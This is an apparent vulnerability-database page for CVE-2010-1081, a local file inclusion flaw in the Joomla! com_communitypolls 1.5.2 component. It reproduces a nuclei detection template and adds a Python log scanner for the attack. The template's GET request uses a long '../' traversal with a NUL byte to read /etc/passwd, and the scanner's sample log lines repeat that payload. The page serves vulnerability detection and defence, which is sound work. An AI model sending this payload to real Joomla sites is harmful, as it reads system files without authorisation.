Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion

27 Sep 2021 11:48:02 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

A local file inclusion vulnerability in the Joomla! component com_communitypolls 1.5.2 allows unauthorized access to sensitive files and potential compromise of the entire Joomla! installation. Apply relevant security patches and upgrades.

Related

| Reporter | Title | Published | Family |
| --- | --- | --- | --- |
| Cvelist | CVE-2010-1081 | 23 Mar 2010 19:00 | cvelist |
| NVD | CVE-2010-1081 | 23 Mar 2010 19:30 | nvd |
| Prion | Directory traversal | 23 Mar 2010 19:30 | prion |
| CVE | CVE-2010-1081 | 23 Mar 2010 19:30 | cve |
| Check Point Advisories | Joomla Component com_communitypolls Local File Inclusion (CVE-2010-1081) | 10 Nov 2014 00:00 | checkpoint_advisories |
| Tenable Nessus | Joomla! / Mambo Component Multiple Parameter Local File Include Vulnerabilities | 4 Jan 2010 00:00 | nessus |

id: CVE-2010-1081

info:
  name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
  remediation: Apply all relevant security patches and product upgrades.
  reference:
    - https://www.exploit-db.com/exploits/11511
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1081
    - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1081
    cwe-id: CWE-22
    epss-score: 0.37754
    epss-percentile: 0.97206
    cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: corejoomla
    product: com_communitypolls
  tags: cve,cve2010,joomla,lfi,edb,corejoomla

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f32746356e8fe22de8b89e7c27c739bf0f5a1bfae2f09f76c2eb515e706082640221009034a2f6e4bf954d8ca147d948a421b298c9f4b6e23604faff49f9483c18883e:922c64590222798bb761d5b6d8e72950
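
A defender-side companion to the template above, as an added example that is not part of the original page or the nuclei project: it scans web server access logs for com_communitypolls requests whose controller parameter contains a `..` path segment or a NUL byte. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request target and status code inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly; logged values may be encoded more than once."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(target):
    """True for a com_communitypolls request whose controller holds '..' or NUL."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_communitypolls" not in (v.lower() for v in params.get("option", [])):
        return False
    for raw in params.get("controller", []):
        value = decode_fully(raw).replace("\\", "/")
        if "\x00" in value or ".." in value.split("/"):
            return True
    return False

def scan(lines):
    """Return (line_number, status, target) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and is_suspicious(match["target"]):
            hits.append((number, int(match["status"]), match["target"]))
    return hits

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Sep/2021:11:00:01 +0000] "GET /index.php?option=com_communitypolls&controller=polls HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Sep/2021:11:00:02 +0000] "GET /index.php?option=com_communitypolls&controller=../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '203.0.113.9 - - [27/Sep/2021:11:00:03 +0000] "GET /index.php?option=com_communitypolls&controller=%2e%2e%2f%2e%2e%2fetc%2fpasswd%00 HTTP/1.1" 404 310',
    '198.51.100.4 - - [27/Sep/2021:11:00:04 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit logged with status 200 corresponds to the template's status matcher and should be reviewed first, since the response may have contained file contents.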

27 Sep 2021 11:02 Current
Vulners AI Score: 5.7 (Medium risk)
CVSS2: 5
EPSS: 0.043